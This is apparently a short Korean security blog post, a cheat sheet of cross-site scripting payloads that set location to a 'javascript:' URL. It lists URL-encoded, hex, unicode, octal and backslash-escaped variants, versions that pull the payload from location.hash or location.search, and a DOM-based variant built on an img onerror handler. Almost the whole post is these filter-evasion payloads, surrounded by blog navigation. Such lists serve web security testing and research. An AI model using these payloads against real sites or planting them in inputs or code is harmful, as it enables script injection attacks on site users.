NGA

XSS location

WEB/JAVASCRIPT
2019. 8. 9. 22:32

location="javascript:alert(1)"
location="javascript:alert%281%29" // urlencode
location="javascript:alert\x281\x29" //  hex
location="javascript:alert\u00281\u0029"  //  unicode
location="javascript:alert\501\51" //  oct
location="\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)"

location=location.hash.slice(1,)   //  #javascript:alert(1)
location=location.search.slice(1,) //  ?javascript:alert(1)

location="javascript:top+\/<img src=x onerror=alert(1)>\/.source" //  make dom base xss

저작자표시

'WEB > JAVASCRIPT' 카테고리의 다른 글

Script tag Comments  (0) 2019.10.14
UTF-8 'LINE SEPARATOR' (U+2028)  (0) 2019.10.14
Auditor bypass with multi inject XSS  (0) 2019.08.10
XSS location.search trick  (0) 2019.08.10
RegRegExp.prototype.source  (0) 2019.08.09

이 글을 공유합시다

facebook twitter googleplus kakaoTalk kakaostory naver band
'WEB/JAVASCRIPT' 의 관련글
댓글

티스토리툴바